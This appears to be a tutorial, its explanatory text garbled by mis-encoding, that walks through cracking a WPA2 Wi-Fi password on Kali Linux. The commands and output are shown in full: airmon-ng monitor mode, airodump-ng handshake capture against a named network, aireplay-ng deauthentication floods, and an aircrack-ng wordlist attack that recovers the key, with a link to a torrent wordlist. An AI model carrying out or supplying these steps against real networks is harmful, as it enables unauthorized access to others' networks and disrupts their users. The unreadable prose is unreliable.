BY : MaTiN sLeMaNy 


^IjS ^jU t ^ 

jj jlj4 JjS jAA 4j4J4j l_5JuAA ^VAj i -ijS ^gjoilj ^gjlj^. 4 j jjj jAjuojU jjj^J 

J^JLJ dbolj^p 


ö j4jAj jUjlSûjUjjojj <1 l_5JuAA ^g-oVûj ^JJJjjl jJ (JûjU (jljjAAj 


,û jAjUaSû j4 jj J« o jS 4 j jjA^ûJ A^Ukj | Uûj4_uo -|— 

. j£ ‘ ûjjj jUj <SUkj <_$ jU usb c chAp ^ 4- 

jj jU»4jLuojA3jAjjjj jAj \ ifconfig 4-^ jjL i ûjûjA5U l_5U1Ujuûjjj Ujuojj 4- 

û jjJ jUoASû jAjjJjo jS jS <S Cliijj L 



root@kali:~# ifconfig
eth0      Link encap:Ethernet  HWaddr
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:48 errors:0 dropped:0 overruns:0 frame:0
          TX packets:48 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3360 (3.2 KiB)  TX bytes:3360 (3.2 KiB)

wlan0     Link encap:Ethernet  HWaddr
          inet addr:192.168.1.102  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr:  Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7066 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4985 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9865125 (9.4 MiB)  TX bytes:476492 (465.3 KiB)

root@kali:~#






e jAj jAjAJ 4 AjAA wlanO ^^-uiJAajAjjj jLalui Jjj IgjAj A-ÛJJ ûjjI -I- 

; Aj jj<5Lj (JjAjuijJ a5^1£AjuojA3jAj1ij jjjl jjAj 


ifconfig <name of the interface> down 


          inet6 addr:  Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7066 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4985 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9865125 (9.4 MiB)  TX bytes:476492 (465.3 KiB)

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:48 errors:0 dropped:0 overruns:0 frame:0
          TX packets:48 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3360 (3.2 KiB)  TX bytes:3360 (3.2 KiB)

wlan0     Link encap:Ethernet  HWaddr
          inet addr:192.168.1.102  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr:  Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4985 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9916183 (9.4 MiB)  TX bytes:476492 (465.3 KiB)

root@kali:~#





airmon-ng start wlan0


♦♦ V £ 

JjoLL J 




          inet addr:192.168.1.102  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr:  Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4985 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9916183 (9.4 MiB)  TX bytes:476492 (465.3 KiB)

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID     Name
2799    NetworkManager
2869    wpa_supplicant
3575    dhclient
Process with PID 3575 (dhclient) is running on interface wlan0

Interface       Chipset         Driver

wlan0           Atheros AR9271  ath9k - [phy0]
                                (monitor mode enabled on mon0)

root@kali:~#




3^ û^ 4 ci iIjAj (ÛH^ û ^ o 

ûV^ û^'j^ t WiFi ^ û 4 ^ ^-^jj^ 

. kill c ^ Ûêh* 

kill <process ID> 




Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID     Name
2799    NetworkManager
2869    wpa_supplicant
3575    dhclient
Process with PID 3575 (dhclient) is running on interface wlan0

Interface       Chipset         Driver

wlan0           Atheros AR9271  ath9k - [phy0]
                                (monitor mode enabled on mon0)

root@kali:~# kill 2799
root@kali:~# kill 2869
root@kali:~# kill 3575





ifconfig j* Ll^ 



. monO l ‘ ^ j jL^d jLi ^^sUuLMijAiuj 


root@kali:~# ifconfig
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:52 errors:0 dropped:0 overruns:0 frame:0
          TX packets:52 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3600 (3.5 KiB)  TX bytes:3600 (3.5 KiB)

mon0      Link encap:UNSPEC  HWaddr C4-6E-1F-16-81-80-00-00-00-00-00-00-00-00-60-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14888 errors:0 dropped:14889 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2566963 (2.4 MiB)  TX bytes:0 (0.0 B)

root@kali:~#





<joijjjj AjLûjS LLoiij 

airodump-ng mon0

. a£öjj ySjl jb j <jUjIj c56j 4 jj j jû Jj Cjjûj\£<j 
jLijj jU4£öjjj<5U] jbj j Id j jli ûj 


4- 

'J- 

i- 


■ 


 CH  1 ][ Elapsed: 1 min ][ 2015-02-20 21:24

 BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID

 10:FE:ED:B7:A2:76  -45      104      0    0  13  54e   WPA2  CCMP    PSK   Anonymus
 F8:E9:03:F4:25:CC  -48      295     31    0  13  54e   WPA2  CCMP    PSK   Private Network
 70:62:B8:C7:54:84  -77      105      1    0   1  54e   WPA2  CCMP    PSK   bhavesh
 9C:E6:E7:54:F8:85  -80       59      0    0   6  54e   WPA2  CCMP    PSK   AndroidAP
 00:1E:A6:25:29:80  -85       25      0    0   6  54e.  WPA2  CCMP    PSK   iBall-Baton
 00:1E:A6:18:9A:2C  -87       10      0    0  13  54e   WPA2  CCMP    PSK   shiv
 D8:FE:E3:73:84:3C  -89        9      0    0   1  54e.  WPA2  CCMP    PSK   Hitesh_Dlink
 C8:D3:A3:15:6B:50  -91        2      0    0   4  54e.  WPA2  CCMP    PSK   Amol_Network
 00:22:7F:66:2D:89  -81        2     20    0  12  54e.  WPA2  CCMP    MGT   <length: 0>
 00:22:7F:26:2D:89  -82        2      0    0  12  54e.  WPA2  CCMP    MGT   <length: 0>

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 (not associated)   18:3B:D2:92:65:9F  -28    0 - 1     0      14
 (not associated)   28:98:7B:40:69:83  -91    0 - 1     0       2  iBall-Baton
 F8:E9:03:F4:25:CC                     -35    0e- 1     0      32
 70:62:B8:C7:54:84  90:68:C3:99:26:4C   -1    0e- 0     0
 9C:E6:E7:54:F8:85  D0:B3:3F:90:96:8D   -1    1e- 0     0       1


cs^ BSSID * 4i 13 Jta* Al 6J ( ê Anonymus 

. 10:FE:ED:B7:A2:76 




•4jq] AjUjS IjjjUb (_ 5 jUJ<A <i ’sj- 

“airodump-ng -c <channel> -w <name> --bssid <bssid> mon0”


 CH 11 ][ Elapsed: 3 mins ][ 2015-02-20 21:26

 BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID

 10:FE:ED:B7:A2:76  -60      293      0    0  13  54e   WPA2  CCMP    PSK   Anonymus
 F8:E9:03:F4:25:CC  -58      834     47    0  13  54e   WPA2  CCMP    PSK   Private Network
 70:62:B8:C7:54:84  -76      265     14    0   1  54e   WPA2  CCMP    PSK   bhavesh
 00:22:7F:A6:2D:88  -81        4      0    0  12  54e.  WPA2  CCMP    PSK   <length: 0>
 9C:E6:E7:54:F8:85  -85      161      0    0   6  54e   WPA2  CCMP    PSK   AndroidAP
 00:1E:A6:25:29:80  -86       70      0    0   6  54e.  WPA2  CCMP    PSK   iBall-Baton
 00:1E:A6:18:9A:2C  -89       32      0    0  13  54e   WPA2  CCMP    PSK   shiv
 D8:FE:E3:73:84:3C  -90       18      0    0   1  54e.  WPA2  CCMP    PSK   Hitesh_Dlink
 00:22:7F:66:2D:89  -84        7     20    0  12  54e.  WPA2  CCMP    MGT   <length: 0>
 00:22:7F:26:2D:89  -83        5      0    0  12  54e.  WPA2  CCMP    MGT   <length: 0>

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 (not associated)   18:3B:D2:92:65:9F  -71    0 - 1     4      28
 (not associated)   68:05:71:99:B6:E6  -90    0 - 1     0       1
 F8:E9:03:F4:25:CC                     -36    0e- 1    77      54
 70:62:B8:C7:54:84  90:68:C3:60:98:16   -1    0e- 0             5
 70:62:B8:C7:54:84  0C:1D:AF:75:C0:DC   -1    0e- 0
 9C:E6:E7:54:F8:85  D0:B3:3F:90:96:8D   -1    1e- 0     0       2

root@kali:~# airodump-ng -c 13 -w handshake --bssid 10:FE:ED:B7:A2:76 mon0


| <_£<Jû j<jûj£j jj j4_^. CJU<JjujJjJJ bûjj] sj_ 

.(capturing data) ûjAjISûJ jS LIj “airodump-ng” . 1 

jL j WiFi ^ vdLka. j^ “<channel>” . 2 

. 6 Run jj ja5L1 







Cs^ ûjASOjl jSj£ a£ ^AjUjb j4j "-w" .3 

. <name> ^ 4^j? (Cjjj c_5ojU j<u) jjjjû 

CjJ^. djjjl jj<j Jj t ^jjöJ (j “handshake” l > / c j> U-0* 1 

du j o5Lu 

. ^jS jjjU djûj<juj <i jLûj^LûAj BSSID 


 CH 13 ][ Elapsed: 4 s ][ 2015-02-20 21:31

 BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID

 10:FE:ED:B7:A2:76  -34   1       65     55   16  13  54e   WPA2  CCMP    PSK   Anonymus

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe

 10:FE:ED:B7:A2:76                     -37    0e- 1    44     103




a£ jjj aJ aJjjj STATION .5 

.(USER) jL 

aJ i oj'i .Vilj diljjjj j j (jojLa j Lka / ^Jujij 

. DATA CACHING 





A 


% % 


; 4jj] AjLajS j û jojA^-j û jlj j]l h ■'j}"' LLuJJ 

“aireplay-ng -0 0 -a <bssid> mon0”

4 j^ û^jUj£ c^öjAJ (J^JJ AIxjJjJJ 

^ j^jMj ^ ‘ j^? Data l$ ö jL; c5 j^ 

& JLoilj t Cjjjjjjjj Ij<a û j 

. UjjjöJ J^'j^ cr^ ö . iiUjS ^ ** 
Jji 4J fAS c/Aj 4£ja o-b t jjjAA ûUjj j jtfb j4&U 4- 

M^Lamûj 4j uSo j t JjjjoJ uSCjA^. AjU jUlSöjli t öAjUj£ ^Aj 

. (WPA handshake (ji 


■i- 


 CH 13 ][ Elapsed: 2 mins ][ 2015-02-20 21:33 ][ WPA handshake: 10:FE:ED:B7:A2:76

 PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

 10:FE:ED:B7:A2:76 -35 0 833 43 13 54e WPA2 CCMP PSK Anonymus

 PWR Rate Lost Frames Probe

 10:FE:ED:B7:A2:76 -41 0e- 0e 135

root@kali:~# aireplay-ng -0 0 -a 10:FE:ED:B7:A2:76 mon0
21:32:51  Waiting for beacon frame (BSSID: 10:FE:ED:B7:A2:76) on channel
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:32:51  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:52  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:52  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:52  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:53  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:53  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:54  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:54  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
          Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
          Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
          Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
          Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:56  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:57  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:57  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:58  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:58  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:59  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:32:59  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]
21:33:00  Sending DeAuth to broadcast -- BSSID: [10:FE:ED:B7:A2:76]



. Is ‘ t »JLj 4. 


root@kali:~# ls
Desktop           handshake-01.csv         handshake-01.kismet.netxml
handshake-01.cap  handshake-01.kismet.csv


Uudi 4 öjjj hanshake UiUjU as jALU j4J ^ajjjöJ 4- 

‘ .cap sJ^i ûUU^jjjj 


.(handshake-Ol.cap) 





: j4_b ijjj jj Ajil ûAjLû , j£ jLjL 

aircrack-ng -w <full location of the wordlist> <the file name> 


root@kali:~# ls
Desktop           handshake-01.csv         handshake-01.kismet.netxml
handshake-01.cap  handshake-01.kismet.csv
root@kali:~# aircrack-ng -w /media/TRANSCEND/Super-WPA handshake-01.cap



ji ^ wordlist jj ’i- 

j<£j <5o j] jL. CimjJ jtj jj jA^j 


Www.torrenthound.com/hash/3flf5321bl275b33bc0970c743be032be828a4f7/t 

orrent-info/WPA-PSK-WORDLIST-3-Final-13-GB-rar 







a1 jLi \jL jjljjûû jbi J- 

C5^it -i? Jj ^ . Crunch 

. <_s-^ j5LLu jû 


                         Aircrack-ng 1.2 beta3

           [00:00:04] 6916 keys tested (1470.48 k/s)

                 Current passphrase: iwouldhewere

 Master Key     : B5 0B D5 88 EF CC D9 6B B6 CF F1 77 C6 59 35 3A
                  E5 5C 4C 16 A6 83 EB DC 91 8B 7A BF 60 0E F8 B4

 Transient Key  : B3 0B 1C 79 F0 13 D2 2E 31 DC FE 92 97 7D 5D 0B
                  7D 9E 4B B9 D2 41 BD 1D 63 8F A0 78 6B 6C 4B E7
                  85 95 BF 34 0A 70 61 5F EF 41 DA AE 73 A2 E4 0C
                  E8 AF 3C E0 52 E0 99 26 49 05 5C E0 95 F4 E2 41

 EAPOL HMAC     : 15 E0 EF 1F 83 6E 71 12 E5 DA 59 FF 66 0F CD 72






                         Aircrack-ng 1.2 beta3

           [00:00:32] 45688 keys tested (1495.68 k/s)

                     KEY FOUND! [ futurama ]

 Master Key     : 95 31 73 6A FD 4E 5A 10 02 E9 42 0B 41 E7 DF 8B
                  10 D2 BF 1C B5 AC 5C BE 3D 25 72 14 8F E8 A1 B6

 Transient Key  : 44 28 49 88 C5 AE EC EE 3A 3F CF 06 A4 6C 4B 42
                  6C 23 81 0F C3 8F 89 4D 89 7A 16 25 E8 5A 1B 26
                  95 20 4C 8F 2A 62 4B CD 1D 08 60 EB A9 7C 65 70
                  7F 0E 53 2E A5 7E D8 75 E3 76 C9 87 E5 2D 49 5F

 EAPOL HMAC     : 09 2E 81 80 7E BB 20 E1 A9 87 48 38 2A DF 60 8B

root@kali:~#






Wireless Network Authentication Required

Authentication required by wireless network

Passwords or encryption keys are required to access the wireless network 'Anonymus'.

Password: futurama

